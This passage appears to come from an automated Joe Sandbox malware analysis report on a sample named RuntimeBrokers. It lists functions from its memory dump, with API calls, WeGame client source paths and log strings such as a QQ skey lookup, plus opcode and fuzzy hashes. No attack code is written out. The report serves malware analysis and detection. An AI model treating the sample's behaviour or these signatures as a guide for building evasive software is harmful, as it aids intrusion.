                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: H_prolog3$?get_log_instance@base@@Logger@1@
                                        • String ID: "$d:\ci_dev\wegame_client\codes\common\src\cfg_file.cpp$std exception in get_file_path_by_key: %1%
                                        • API String ID: 1369574949-2532590550
                                        • Opcode ID: c61569d003a1f4bb384f1d2239b5f09e01b060065a2911bf02ad7e2512c0b933
                                        • Instruction ID: adcac253653725f543e2e7d41ec6a3494ec478d37edb7ef9140dcb9b3233e9f2
                                        • Opcode Fuzzy Hash: c61569d003a1f4bb384f1d2239b5f09e01b060065a2911bf02ad7e2512c0b933
                                        • Instruction Fuzzy Hash: DB118B30901168ABDB11DBA4CD58BDDB3F4AF54308F1480D8D445BB681EB35AF48CFA1
                                        Function 6C14A147 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • fopen.API-MS-WIN-CRT-STDIO-L1-1-0(stamp_record.log,6C348B58), ref: 6C14A15F
                                        • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6C14A1DB
                                          • Part of subcall function 6C10E5E2: __vfprintf_l.MSPDB140-MSVCRT ref: 6C10E5F1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: __vfprintf_lfclosefopen
                                        • String ID: %80s%12.3f$stamp_record.log
                                        • API String ID: 2839667847-2832209799
                                        • Opcode ID: 5b80087ef7964ec8c273734c1c16d85dad8b0d1072c3c3354f6ae050f2b177fa
                                        • Instruction ID: 0cbb5fefaeeb04c67f4a74c68840ec7b9fddc3458259651d3a39e16922622c92
                                        • Opcode Fuzzy Hash: 5b80087ef7964ec8c273734c1c16d85dad8b0d1072c3c3354f6ae050f2b177fa
                                        • Instruction Fuzzy Hash: C711E139B01A04EFCB10EFB8C881C8BB7B9FF827587118219E80557640DB34B905CAE1
                                        Function 6C137CA7 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 50COMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3_GS.LIBCMT ref: 6C137CAE
                                        • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(00000050,6C137D5B,?,?,?), ref: 6C137CB8
                                          • Part of subcall function 6C0BA5EF: __EH_prolog3.LIBCMT ref: 6C0BA5F6
                                        Strings
                                        • [qos]Set launcher info: %s - %llu., xrefs: 6C137D01
                                        • d:\ci_dev\wegame_client\codes\common\src\qos_command.cpp, xrefs: 6C137CDC
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: ?get_log_instance@base@@H_prolog3H_prolog3_Logger@1@
                                        • String ID: [qos]Set launcher info: %s - %llu.$d:\ci_dev\wegame_client\codes\common\src\qos_command.cpp
                                        • API String ID: 52498757-2497862619
                                        • Opcode ID: e523f32ef42bae9a9ce4fcd71877960c703d22ae0f6e1fc93a56aa1124802d97
                                        • Instruction ID: 6927b16d703452fe07f13451b54bcbcca317b47180bc29544ef25b8e0d05a464
                                        • Opcode Fuzzy Hash: e523f32ef42bae9a9ce4fcd71877960c703d22ae0f6e1fc93a56aa1124802d97
                                        • Instruction Fuzzy Hash: 47118E71A00205ABCB04DF94CD91FED73A1BF54718F104568E919AFBC5DB75AA09CB90
                                        Function 6C102DCD Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 40COMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3_GS.LIBCMT ref: 6C102DD4
                                          • Part of subcall function 6C0BCEF6: memmove.VCRUNTIME140(00000000,?,?,00000001,?,?,?,?,?,?,6C0BA734,?,00000004,6C0BA09E,?,B33B76E5), ref: 6C0BCF55
                                        • ?string@path@filesystem@ierd_tgp@@QBE?BV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@XZ.COMMON(?), ref: 6C102E36
                                          • Part of subcall function 6C104C8B: __EH_prolog3_GS.LIBCMT ref: 6C104C92
                                          • Part of subcall function 6C104C8B: ?u16_to_loc@common@ierd_tgp@@YA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@AAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@4@@Z.COMMON(?,?,00000028,6C102E3B), ref: 6C104CC0
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: D@std@@H_prolog3_U?$char_traits@V?$allocator@V?$basic_string@$?string@path@filesystem@ierd_tgp@@?u16_to_loc@common@ierd_tgp@@D@2@@4@@D@2@@std@@U?$char_traits@_V?$allocator@_V?$basic_string@_W@2@@std@@W@std@@memmove
                                        • String ID: /$\
                                        • API String ID: 2552136784-1600464054
                                        • Opcode ID: fa8628b77e4c61ddeeb1a030ff4db6d48755571f30f71fa40d369a86a6aedc98
                                        • Instruction ID: 8bab1e511ebb3dcd738a8026a2393f2a648a8290d8b1279a907f045d0ebd17bc
                                        • Opcode Fuzzy Hash: fa8628b77e4c61ddeeb1a030ff4db6d48755571f30f71fa40d369a86a6aedc98
                                        • Instruction Fuzzy Hash: A51125B2D01208EBDB04DF98C884AEEFBB4EF68314F545009E50177640DB756A89CFA1
                                        Function 6C102E57 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 40COMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3_GS.LIBCMT ref: 6C102E5E
                                          • Part of subcall function 6C0BCEF6: memmove.VCRUNTIME140(00000000,?,?,00000001,?,?,?,?,?,?,6C0BA734,?,00000004,6C0BA09E,?,B33B76E5), ref: 6C0BCF55
                                        • ?wstring@path@filesystem@ierd_tgp@@QBE?BV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@XZ.COMMON(?), ref: 6C102EC0
                                          • Part of subcall function 6C0BFACF: __EH_prolog3.LIBCMT ref: 6C0BFAD6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: ?wstring@path@filesystem@ierd_tgp@@H_prolog3H_prolog3_U?$char_traits@_V?$allocator@_V?$basic_string@_W@2@@std@@W@std@@memmove
                                        • String ID: /$\
                                        • API String ID: 3222246860-1600464054
                                        • Opcode ID: ed86d94f333850168e8adfae4274eae2beb1e2fdee7bcd4d8e3d9ff2e58655f4
                                        • Instruction ID: fc6ac6f69d9f881c1e83d7a21768a235fac9624b78813ef680d169883cb44580
                                        • Opcode Fuzzy Hash: ed86d94f333850168e8adfae4274eae2beb1e2fdee7bcd4d8e3d9ff2e58655f4
                                        • Instruction Fuzzy Hash: 4011D3B5D01208DBDB04DF98C894AEEFBB4EF68314F54501AE50177A40D7756A89CFA1
                                        Function 6C0FA528 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38COMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3_GS.LIBCMT ref: 6C0FA52F
                                        • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(00000054), ref: 6C0FA534
                                          • Part of subcall function 6C0BA5EF: __EH_prolog3.LIBCMT ref: 6C0BA5F6
                                        Strings
                                        • d:\ci_dev\wegame_client\codes\common\src\curl_wrapper.cpp, xrefs: 6C0FA558
                                        • [CurlWrapper]get_qq_skey_value, CurlWriteCallback buf_size: {}, xrefs: 6C0FA579
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: ?get_log_instance@base@@H_prolog3H_prolog3_Logger@1@
                                        • String ID: [CurlWrapper]get_qq_skey_value, CurlWriteCallback buf_size: {}$d:\ci_dev\wegame_client\codes\common\src\curl_wrapper.cpp
                                        • API String ID: 52498757-2245295932
                                        • Opcode ID: c9881f1da733a92f8abf58ae28602c81974f699f216864829cd648af5b8fdd3c
                                        • Instruction ID: aa489577352fa7383b9560d5f0a7b41649495ab7447090e9524da9f37a14b25f
                                        • Opcode Fuzzy Hash: c9881f1da733a92f8abf58ae28602c81974f699f216864829cd648af5b8fdd3c
                                        • Instruction Fuzzy Hash: 71F08135A007159BCF09DBA4CC65BED73A1AF54718F205149E8253FBC0DB76AE4ACB50
                                        Function 6C152AD3 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 35COMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3_GS.LIBCMT ref: 6C152ADA
                                        • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(00000050), ref: 6C152ADF
                                          • Part of subcall function 6C0BA5EF: __EH_prolog3.LIBCMT ref: 6C0BA5F6
                                          • Part of subcall function 6C0BE945: __EH_prolog3_catch_GS.LIBCMT ref: 6C0BE94C
                                        Strings
                                        • [Sys_wrapper]has modal exist : %d, xrefs: 6C152B1F
                                        • d:\ci_dev\wegame_client\codes\common\src\sys_wrapper.cpp, xrefs: 6C152B03
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: ?get_log_instance@base@@H_prolog3H_prolog3_H_prolog3_catch_Logger@1@
                                        • String ID: [Sys_wrapper]has modal exist : %d$d:\ci_dev\wegame_client\codes\common\src\sys_wrapper.cpp
                                        • API String ID: 245828788-1483221781
                                        • Opcode ID: f43301d45fde683f1022bed1918379424e1f39a2a7d0d761731eeb885fba40e8
                                        • Instruction ID: bc13026949da300cf2c50f3daa5e134a786f7f2a37713b69d0f3c5912b558311
                                        • Opcode Fuzzy Hash: f43301d45fde683f1022bed1918379424e1f39a2a7d0d761731eeb885fba40e8
                                        • Instruction Fuzzy Hash: DEF02BB1A406016BDB14E7A0CC65FEC37705F60708F604184E4653FAC5DB6ABE0FDA90
                                        Function 6C152B89 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 32libraryloaderCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetModuleHandleA.KERNEL32(kernel32.dll,GetNativeSystemInfo), ref: 6C152BA7
                                        • GetProcAddress.KERNEL32(00000000), ref: 6C152BAE
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: AddressHandleModuleProc
                                        • String ID: GetNativeSystemInfo$kernel32.dll
                                        • API String ID: 1646373207-192647395
                                        • Opcode ID: 066360a70000868d7a78cc7b5fbf98f80b231625b276f8b430e75447857bc736
                                        • Instruction ID: d2da565be9cd9774e625c1f9653280ce36d99bc4ecf45f4c4eaee13aab764def
                                        • Opcode Fuzzy Hash: 066360a70000868d7a78cc7b5fbf98f80b231625b276f8b430e75447857bc736
                                        • Instruction Fuzzy Hash: FAE0E5A3F102056ACF20EBB6990C8DF77FCDB89354B400499E511B7140E6669A85C7B0
                                        Function 6C0CAC2A Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 30COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: H_prolog3
                                        • String ID: 04l$84l$x3l
                                        • API String ID: 431132790-26773525
                                        • Opcode ID: 40310739e85017b2119f4803fb4609b2d89a04924c28d08a12c0314d3af6bc6b
                                        • Instruction ID: a8fd2e253d5574d61f128be7adbf8375d8d47817efb1006f385acc094c7e0ec1
                                        • Opcode Fuzzy Hash: 40310739e85017b2119f4803fb4609b2d89a04924c28d08a12c0314d3af6bc6b
                                        • Instruction Fuzzy Hash: C70112796007688FCB20CFA4C18679EBAF0BB11318F50864CE6965BAA0C774EA09CF40
                                        Function 6C0C282E Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 30COMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3.LIBCMT ref: 6C0C2835
                                          • Part of subcall function 6C0C26B2: __EH_prolog3.LIBCMT ref: 6C0C26B9
                                        • ??0CShareMem@@QAE@XZ.COMMON(00000008), ref: 6C0C285A
                                          • Part of subcall function 6C0C278E: __EH_prolog3.LIBCMT ref: 6C0C2795
                                          • Part of subcall function 6C0C2687: lstrcpyA.KERNEL32(?,?,?,?,?,UtilWndClass,?,?,6C0C287C,?,?), ref: 6C0C26A5
                                        • InitializeCriticalSection.KERNEL32(?,?,?), ref: 6C0C2884
                                          • Part of subcall function 6C0C3380: lstrlenA.KERNEL32(?,?,?,6C0C2897,WeGameIPCWndClass10,?,?), ref: 6C0C3389
                                          • Part of subcall function 6C0C3380: lstrcpynA.KERNEL32(?,?,00000020,?,?,6C0C2897,WeGameIPCWndClass10,?,?), ref: 6C0C33A1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: H_prolog3$CriticalInitializeMem@@SectionSharelstrcpylstrcpynlstrlen
                                        • String ID: WeGameIPCWndClass10
                                        • API String ID: 3803824369-583084041
                                        • Opcode ID: ddfe6687bf0a0b1e42c6a4d0725fc1cab904aa88c0c7b2080236bcdcc4d95993
                                        • Instruction ID: dfe6c18a030b1d4349a6e4d01f6c5d23e3a1e5c98aa0a6309c2bff24d9f4523b
                                        • Opcode Fuzzy Hash: ddfe6687bf0a0b1e42c6a4d0725fc1cab904aa88c0c7b2080236bcdcc4d95993
                                        • Instruction Fuzzy Hash: CAF03170501646ABC704DF54C6497DCBBB4BF15318F905159E015A7F80CB78AA28CB92
                                        Function 6C0CA916 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 30COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: H_prolog3
                                        • String ID: p4l$x4l$x3l
                                        • API String ID: 431132790-4188956416
                                        • Opcode ID: e4cbabcbe5f4c910a7229c8677a5ab1b5b4c55862ae9a7f9c8d0e8b9e9580299
                                        • Instruction ID: 34bbbf4134d8a9d86ae1e3f0b1ed787fdcc822ec7eb98941e974de9d875f2d09
                                        • Opcode Fuzzy Hash: e4cbabcbe5f4c910a7229c8677a5ab1b5b4c55862ae9a7f9c8d0e8b9e9580299
                                        • Instruction Fuzzy Hash: 11011279600B54CFCB20DF94C58679DBBF0BB19328F50865DE5995BBA0C774AA08CF84
                                        Function 6C1264F6 Relevance: 6.3, APIs: 5, Instructions: 89COMMON
                                        Download Yara Rule
                                        APIs
                                        • memset.VCRUNTIME140(?,00000000,00000031,6C43F000,?,?), ref: 6C126527
                                        • memmove.VCRUNTIME140(?,?,00000004,6C43F000,?,?), ref: 6C12655A
                                        • memmove.VCRUNTIME140(?,?,00000004,?,?,00000004,6C43F000,?,?), ref: 6C126565
                                        • memmove.VCRUNTIME140(?,?,00000004,?,?,00000004,?,?,00000004,6C43F000,?,?), ref: 6C126573
                                        • memmove.VCRUNTIME140(?,?,00000004,?,?,00000004,?,?,00000004,?,?,00000004,6C43F000,?,?), ref: 6C126581
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: memmove$memset
                                        • String ID:
                                        • API String ID: 3790616698-0
                                        • Opcode ID: ced38726b32299c016e7a7538d0c8b908dd06b619473bbf6982f625de9e413ec
                                        • Instruction ID: ce9fe3105864d40c3edbc929f147b059a6181ab17175d9e7bd80e340e327dfdc
                                        • Opcode Fuzzy Hash: ced38726b32299c016e7a7538d0c8b908dd06b619473bbf6982f625de9e413ec
                                        • Instruction Fuzzy Hash: 99314FB6D00208AFDB15DFE8D8809DEB7BCEF08644F14062AE551E7640E774AA4A8F91
                                        Function 004E406F Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2954513519.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.2954495294.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954625279.000000000052E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954661807.0000000000577000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954678573.0000000000578000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954698601.000000000058A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: __alldvrm$_strrchr
                                        • String ID:
                                        • API String ID: 1036877536-0
                                        • Opcode ID: 3660afbe3352857d41f7c9875008d8f0d33c4af9a12b84d5bf4becbe31cb035e
                                        • Instruction ID: 374899474e4908256790883f99f1578993bd7715736711350763ff98a07cd9f6
                                        • Opcode Fuzzy Hash: 3660afbe3352857d41f7c9875008d8f0d33c4af9a12b84d5bf4becbe31cb035e
                                        • Instruction Fuzzy Hash: E1A14671A003C69FDB11CF5AC8817AEBBA5EFA5351F1841AFEA949B342C23C8941C759
                                        Function 6C0DAD78 Relevance: 6.2, APIs: 4, Instructions: 230COMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3_GS.LIBCMT ref: 6C0DAD82
                                        • EnterCriticalSection.KERNEL32(-00000039,?), ref: 6C0DAF1B
                                        • LeaveCriticalSection.KERNEL32(-00000039,?), ref: 6C0DAF3C
                                        • ReleaseSemaphore.KERNEL32(?,00000001,00000000), ref: 6C0DAF4B
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
